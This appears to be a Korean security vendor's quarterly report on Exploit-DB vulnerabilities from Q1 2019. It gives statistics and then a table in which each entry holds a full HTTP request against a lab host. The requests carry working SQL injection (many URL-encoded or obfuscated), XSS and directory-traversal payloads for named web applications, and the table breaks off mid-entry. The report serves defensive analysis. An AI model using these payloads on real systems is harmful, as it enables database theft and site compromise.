Post on 07-Feb-2023
1. 취약점별 보고 개수취약점 보고 개수
SQL Injection 116
XSS 42
Directory Traversal 8
File Upload 4
LFI 3
총합계 173
2. 위험도별 분류위험도 보고 개수 백분율
상 15 8.67%
중 42 24.28%
하 116 67.05%
총합계 173 100.00%
3. 공격 난이도별 현황공격 난이도 보고 개수 백분율
상 6 3.47%
중 38 21.97% POST
/10.0.100.24/administ하 129 74.57%
총합계 173 100.00%
4. 주요 소프트웨어별 취약점 발생 현황소프트웨어 이름(보고 개수 2개 이상) 보고 개수
Joomla! Component 12
Netartmedia 8
Jettweb 6
DomainMOD 4
qdPM 3
osCommerce 3
Ask Expert Script 2
Zeeways 2
PHP Ecommerce Script 2
PHP Dashboards NEW 2
phpTransformer 2
CMSsite 2
XAMPP 2
SJS 2
WordPress Plugin 2
SuiteCRM 2
Roxy Fileman 2
Find a Place CMS Directory 2
Apache CouchDB 2
pfSense 2
총합계 64
EDB 분석 보고서 (2019.1Q)2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
분석 내용 정리 (작성: 펜타시큐리티시스템 보안성평가팀)
2019년 01월부터 03월까지 EDB 분석 보고서에 공개된 취약점은 173개입니다.
가장 많은 수의 취약점이 공개된 공격은 SQL Injection 입니다. 또한 많은 취약점이 공개된 소프트웨어는 Joomla Component, Netartmedia로, 각각 12개, 8개의 취약점이 공개되었습니다. 그
중 Joomla Component 소프트웨어에 수행된 공격은 SQL Injection이며, 본 공격은 처음에는 난이도가 낮은 공격이라도 일단 취약점이 발견되면 해당 취약점의 파라미터에 다양한 SQL 쿼리를
이용하는 SQL Injection 공격을 할 수 있으므로 위험도 측면에서는 매우 높은 공격에 속합니다. 해당 취약점을 예방하기 위해서 최신 패치와 시큐어 코딩을 권장합니다. 하지만 완벽한 시큐
어 코딩은 불가능하며, 지속적으로 보안성을 유지하기 위해서 웹방화벽을 활용한 심층방어 (Defense indepth) 구현을 고려해야 합니다.
116
42
84 3
0
20
40
60
80
100
120
140
SQL Injection XSS Directory Traversal File Upload LFI
취약점별 보고 개수
15
42
116
위험도별 분류
상
중
하
6
38
129
공격 난이도별 현황
상
중
하
12
8
6
433
2
2
2
2
2
2
2
2
2
2
2
22
2
주요 소프트웨어별 취약점 발생 현황
Joomla! Component Netartmedia Jettweb DomainMOD
qdPM osCommerce Ask Expert Script Zeeways
PHP Ecommerce Script PHP Dashboards NEW phpTransformer CMSsite
XAMPP SJS WordPress Plugin SuiteCRM
Roxy Fileman Find a Place CMS Directory Apache CouchDB pfSense
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
2019-01-02 46066 SQL Injection 하 중
WordPress Plugin Adicon
Server 1.2 - 'selectedPlace' SQL
Injection
POST /10.0.100.24 HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD);
WordPress PluginWordPress
Plugin AdiconServer 1.2
2019-01-02 46067 XSS 하 하Frog CMS 0.9.5 - Cross-Site
Scripting
POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 34Connection: closeUpgrade-Insecure-Requests: 1
username=<script>alert(1)</script>
Frog CMSFrog CMS0.9.5
2019-01-07 46076 XSS 하 하Embed Video Scripts -
Persistent Cross-Site Scripting
POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencodedContent-Length: 126
Connection: closeUpgrade-Insecure-Requests: 1
message=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=h
ttps%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png
Embed VideoEmbed Video
Scripts
2019-01-07 46077 SQL Injection 하 상
All in One Video Downloader
1.2 - Authenticated SQL
Injection
POST /10.0.100.24/admin/?view=page- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 87DNT: 1
Connection: keep-aliveUpgrade-Insecure-Requests: 1
edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
All in One Video
Downloader
All in OneVideo
Downloader1.2
2019-01-07 46079 XSS 하 하LayerBB 1.1.1 - Persistent
Cross-Site Scripting
POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 34Connection: closeUpgrade-Insecure-Requests: 1
title=<script>alert('XSS')</script>
LayerBB LayerBB 1.1.1
2019-01-07 46080 XSS 하 하
MyBB OUGC Awards Plugin
1.8.3 - Persistent Cross-Site
Scripting
POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded
Content-Length: 34Connection: closeUpgrade-Insecure-Requests: 1
user=<script>alert('XSS')</script>
MyBB OUGC Awards
Plugin
MyBB OUGCAwards Plugin
1.8.3
2019-01-07 46081 XSS 하 하
PLC Wireless Router
GPN2.4P21-C-CN - Cross-Site
Scripting
POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)
Gecko/20100101 Firefox/63.0Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 44Connection: closeUpgrade-Insecure-Requests: 1
payload=<script>alert("XSS-Saurav")</script>
PLC WirelessRouter
PLC WirelessRouter
GPN2.4P21-C-CN
2019-01-07 46082 XSS 하 하phpMoAdmin MongoDB GUI
1.1.5 - Cross-Site Scripting
GET/10.0.100.24/phpmoadmin/moadmin.php?db=admin%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencodedContent-Length: 101Connection: closeUpgrade-Insecure-Requests: 1
db=<script>alert(1)</script>newdb=<script>alert(2)</script>collection=<script>alert(3)</script>
phpMoAdmin MongoDBGUI
phpMoAdminMongoDB GUI
1.1.5
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-01-07 46084 SQL Injection 하 상
MyT Project Management 1.5.1
- 'Charge[group_total]' SQL
Injection
POST /10.0.100.24/charge/admin HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 172
Charge[user_name]=k&Charge[group_total]=1) ANDEXTRACTVALUE(2003,CONCAT(0x5c,0x7171716b71,(SELECT(ELT(2003=2003,1))),0x7170707071))--eaYu&Charge_page=1&ajax=charge-grid
MyT ProjectManagement
MyT ProjectManagement
1.5.1
2019-01-07 46172 File Upload 하 상Roxy Fileman 1.4.5 -
Unrestricted File Upload
GET/10.0.100.24/fileman/php/download.php?f=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads%2F%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1
Roxy FilemanRoxy Fileman
1.4.5
2019-01-07 46172 Directory Traversal 중 하Roxy Fileman 1.4.5 - Directory
Traversal
GET/10.0.100.24/fileman/php/download.php?f=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads%2F%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1
Roxy FilemanRoxy Fileman
1.4.5
2019-01-08 46095 SQL Injection 상 중Dolibarr ERP-CRM 8.0.4 - 'rowid'
SQL Injection
POST /10.0.100.24/doli/htdocs/admin/dict.php?id=16 HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencodedContent-Length: 331
actionmodify=Modify&button_removefilter=Removefilter&button_search=Search&code=PL_NONE&entity=&from=&libelle=None&page=0&position=1&rowid=\%'
AND EXTRACTVALUE(6385,CONCAT(0x5c,0x716b717871,(SELECT(ELT(6385=6385,1))),0x7176787171)) AND'%'='&search_code=94102&token=$2y$10$KhKjYSBlkY24Xl8v.d0ZruN98LAFOAZ5a5dzi4Lxe3g21Gx46deHK
Dolibarr ERP-CRMDolibarr ERP-
CRM 8.0.4
2019-01-10 46111 SQL Injection 상 중doitX 1.0 - 'search' SQL
Injection
GET/10.0.100.24/searchs?search=%45%66%65%27%20%2f%2a%21%31%31%31%31
%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31,%76%65%72%73%69%6f%6e%28%29,%33%2c%34%2c%35,%3
6%2c%37%2c%38%2c%39%2c%31%30,%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35,%31%36%2c%31%37%2d%2d%20%2d&search_from=entries HTTP/1.1
doitX doitX 1.0
2019-01-10 46112 SQL Injection 상 중Shield CMS 2.2 - 'email' SQL
Injection
POST /10.0.100.24/shield/forgot.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 749Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2;EU_COOKIE_LAW_CONSENT=trueDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1_csrf=0089a3c48ac05616e608ef7e74c98411&email=%27%7c%7c%28%53%45%4c%45%43%54%20%27%62%5a%74%57%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45%20%31%31%3d%31%31%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%5
3%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%
4c%45%43%54%20%28%45%4c%54%28%31%31%3d%31%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&submit=Reset%2BPassword: undefined
Shield CMSShield CMS
2.2
2019-01-10 46113 SQL Injection 상 상Architectural 1.0 - 'email' SQL
Injection
POST /10.0.100.24/backoffice/forgot.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)
Gecko/20100101 Firefox/55.0Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded
Content-Length: 749Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2;
EU_COOKIE_LAW_CONSENT=trueDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
_csrf=0089a3c48ac05616e608ef7e74c98411&email=%27%7c%7c%28%53%45%4c%45%43%54%20%27%62%5a%74%57%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45%20%31%31%3d%31%31%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%3d%31%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&submit=Reset%2BPassword: undefined
ArchitecturalArchitectural
1.0
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-01-10 46114 SQL Injection 하 하 MLMPro 1.0 - SQL Injection
POST /10.0.100.24/login.php?section=login HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 538Cookie: PHPSESSID=e1js8vek57sgge2oso51do2255DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
username=%2d%31%27%20%55%4eI%4f%4e%20%2f%2a%21%31%31%31%31%31%53
EL%45%43%54%2a%2f%20%31%2c%32%2c%33%2c%34%2c%35%2c%36,%43%4f%4e%43%41%54%28%55%53%45%52%28%29%2c%30%78%32%64%2c%56%45%52%53%49%4f%4e%28%29%29%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36,%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2d%2d%20%2d&password=&submit=Login: undefined
MLMPro MLMPro 1.0
2019-01-10 46115 SQL Injection 하 하Event Calendar 3.7.4 - 'id' SQL
Injection
GET/10.0.100.24/events_edit.php?id=%2d%31%30%33%31%27%20%2f%2a%21%31%31%31%311%55%4e%49%4f%4e%20%2a%2f%2f%2a!11111SELE%43%54%2a%2f%20%31%2c%32%2c%33%2c%76%65%72%73%69%6f%6e%28%29%2c%35%2c%36%2c%37,8--%20- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflateCookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2;EU_COOKIE_LAW_CONSENT=trueDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Event CalendarEvent
Calendar3.7.4
2019-01-10 46116 SQL Injection 하 하Event Locations 1.0.1 - 'id' SQL
Injection
GET/10.0.100.24/events_edit.php?id=%2d%32%33%36%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31111%31%53%45%4c%45%43%54%2a%2f%20%31%2c%32%2c%33%2c%76%65%72%73%69%6f%6e%28%29%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1
Event LocationsEvent
Locations1.0.1
2019-01-10 46117 SQL Injection 중 하eBrigade ERP 4.5 - SQL
Injection
GET/10.0.100.24/pdf.php?pdf=DPS&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4fM%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4fNCA%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43AT(C%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%
46%52OM+%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4cES+W%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54+%30%2c%31%29,%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4cES+GR%4f%55%50%20%42%59%20%78%29%61%29HTTP/1.1
eBrigade ERPeBrigade ERP
4.5
2019-01-10 46118 SQL Injection 하 중OpenSource ERP 6.3.1. - SQL
Injection
POST /10.0.100.24/db/utils/query/data.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64)AppleWebKit/537.36(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8Origin: http://10.0.100.24:1004Referer: http://10.0.100.24:1004/Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Cookie: MneHttpSessionId8024=15471285865828
Host: 10.0.100.24:1004
Content-Length: 414Accept-Encoding: gzip, deflateConnection: close
sqlend=1&query=%27%7c%7ccast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7c(SELECT+VERSION())%7c%7cchr(95)%7c%7cchr(33)%7c%7cchr(64))+as+numeric)%7c%7c%27&schema=mne_application&table=userpref&cols=startweblet%2cregion%2cmslanguage%2cusername%2cloginname%2cpersonid%2clanguage%2cregionselect%2ctimezone%2ccountrycarcode%2cstylename%2cusername%2cstartwebletname&usernameInput.old=session_user&mneuserloginname=test
OpenSource ERPOpenSourceERP 6.3.1.
2019-01-11 46119 SQL Injection 중 하Adapt Inventory Management
System 1.0 - SQL Injection
POST /10.0.100.24/admin/login.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 291Cookie: PHPSESSID=e23redq9bp28kar813ggnk4g87DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
username=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&password=%27: undefined
Adapt InventoryManagement System
AdaptInventoryManagementSystem 1.0
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-01-11 46122 SQL Injection 중 하Joomla! Component JoomCRM
1.1.1 - SQL Injection
GET
/10.0.100.24/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=31%39%20A%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52OM%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41T%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53E()%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%
41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3dDAT%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4fRMA%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)
Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: __cfduid=d32095db21c106516d53cae46d08e3e291547158024;5cccc826c28cb27e67933089ce2566a0=1ad52e59a11808d25fa5e93d022c74f3; joomla_user_state=logged_inDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Joomla! ComponentJoomla!Component
JoomCRM 1.1.1
2019-01-14 46134 SQL Injection 하 중i-doit CMDB 1.12 - SQL
Injection
GET/10.0.100.24/?objGroupID=%31%32%27%7c%7c%28SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20%28seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT%28CONcat(0x203a20%2cUseR()%2cDAtaBASe()%2cVErsION())%2c(SeLEct%20%28ELT(112=112%2c1%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x%29a%29%29%7c%7c%27 HTTP/1.1
i-doit CMDBi-doit CMDB
1.12
2019-01-14 46138 SQL Injection 상 상 Modern POS 1.3 - SQL Injection
GET/10.0.100.24/_inc/pos.php?query_string=Efe%27||(/*!11111SElecT*/
+%27Efe%27+/*!11111FRom*/+/*!11111DuAl*/+/*!11111whERE*/+6=6+/*!11111anD*/+(/*!11111SEleCT*/+6+/*!11111FRoM*/(/*!11111SELECT*/+C
OuNT(*),/*!11111CONCAT*/(@@verSion,(/*!11111seleCT*/+(ELT(6=6,1))),/*!11111FLoOR*/(RAnD(0)*2))x+/*!11111FRoM*/+/*!12345InFOrMaTI
ON_SchEmA.plUgINS*/+/*!11111grOUP*/+/*!11111by*/+x)a))||%27&action_type=PRODUCTLIST HTTP/1.1
Modern POSModern POS
1.3
2019-01-14 46139 SQL Injection 하 하
Twilio WEB To Fax Machine
System Application 1.0 - SQL
Injection
POST /10.0.100.24/login_check.php HTTP/1.1
Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencodedContent-Length: 75
Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9fDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
email=1&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&submit=Login: undefined
Twilio WEB To Fax
Machine SystemApplication
Twilio WEB ToFax Machine
SystemApplication
1.0
2019-01-14 46141 SQL Injection 하 하Live Call Support Widget 1.5 -
SQL Injection
GET/10.0.100.24/add_widget.php?wid=%2d%34%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%201,%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e()%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1
Live Call SupportWidget
Live CallSupport
Widget 1.5
2019-01-14 46144 SQL Injection 하 중Craigs Classified Ads CMS
Theme 1.0.2 - SQL Injection
GET /10.0.100.24/profile_detail.php?users=-x%27%20UNION%20SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)
,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, brCookie: PHPSESSID=3peclhdno4t80jmagl0gurf1o4
DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Craigs ClassifiedAds CMS Theme
CraigsClassified
Ads CMS Theme1.0.2
2019-01-14 46145 SQL Injection 하 하Find a Place CMS Directory 1.5
- SQL Injection
GET
/10.0.100.24/detail.php?title=&id=2%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatI
ON_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Find a Place CMSDirectory
Find a PlaceCMS Directory
1.5
2019-01-14 46146 SQL Injection 하 중 Cleanto 5.0 - SQL Injection
